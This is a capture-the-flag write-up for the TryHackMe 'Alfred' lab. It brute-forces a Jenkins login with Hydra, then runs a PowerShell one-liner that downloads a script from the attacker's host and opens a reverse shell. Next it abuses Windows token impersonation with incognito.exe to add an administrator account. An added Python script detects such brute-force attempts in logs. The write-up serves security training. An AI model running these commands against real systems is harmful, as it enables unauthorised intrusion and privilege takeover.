TryHackMe — Alfred w/o MSF
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

[1]NMAP Scan
sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred

[2]Visit Webpage
http://10.10.131.184:8080

[3]Brute-force the login page
Capture the login traffic using Burp Suite:

Brute-force the form with Hydra's http-post-form module.
Parameters for Hydra:
URL: /j_acegi_security_check
USER = j_username
PASS = j_password
Port = 8080
Invalid login message = Invalid username or password
hydra -s 8080 10.10.131.184 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password" -L user.txt -P rockyou.txt -t 10 -w 30
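As an added defender-side example (not part of the room or this writeup), a small Python script that flags the burst of POSTs to /j_acegi_security_check that a Hydra run like the one above leaves behind in a Jenkins access log. The NCSA-style log line format, the sample entries and the 10-in-60-seconds threshold are constructed assumptions, and input lines are assumed to be in chronological order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_ENDPOINT = "/j_acegi_security_check"   # Jenkins form-login target
# Assumed NCSA common-log style: ip - - [ts] "METHOD path proto" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_login_bursts(lines, threshold=10, window_seconds=60):
    """Flag source IPs that POST to the login endpoint at least `threshold` times
    within any `window_seconds` span (the pattern a Hydra run produces).
    Returns {ip: (start_of_window, count_when_first_flagged)}."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    flagged = {}
    window = timedelta(seconds=window_seconds)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, _status = parsed
        if method != "POST" or path != LOGIN_ENDPOINT:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = (q[0], len(q))
    return flagged

# Constructed sample: 12 login POSTs from one source within 3 seconds, plus benign traffic.
def _line(ip, sec, method, path, status):
    return f'{ip} - - [10/May/2024:12:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 0'

SAMPLE_LOG = (
    [_line("10.11.17.48", i // 4, "POST", LOGIN_ENDPOINT, 302) for i in range(12)]
    + [_line("10.10.10.5", 5, "GET", "/login", 200),
       _line("10.10.10.5", 9, "POST", LOGIN_ENDPOINT, 302)]
)

if __name__ == "__main__":
    for ip, (start, count) in find_login_bursts(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}: {count} login POSTs since {start:%H:%M:%S}")
```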

[4]Log in to the web page using the gathered credentials


[5]Set up a Python web server and a netcat listener on Kali

[6]Download Invoke-PowerShellTcp.ps1 onto the target machine and run it
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.17.48:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.48 -Port 1337



[7]Escalate privileges
whoami /priv

[8]Exploit SeImpersonatePrivilege using incognito.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.11.17.48:8000/incognito.exe','incognito.exe')"

./incognito.exe add_user dummy pass123
./incognito.exe add_localgroup_user Administrators dummy

[9]Log in over RDP using the dummy account
rdesktop -u dummy -p pass123 10.10.131.184

Run cmd as Administrator.


References:
https://tryhackme.com/room/alfred
https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip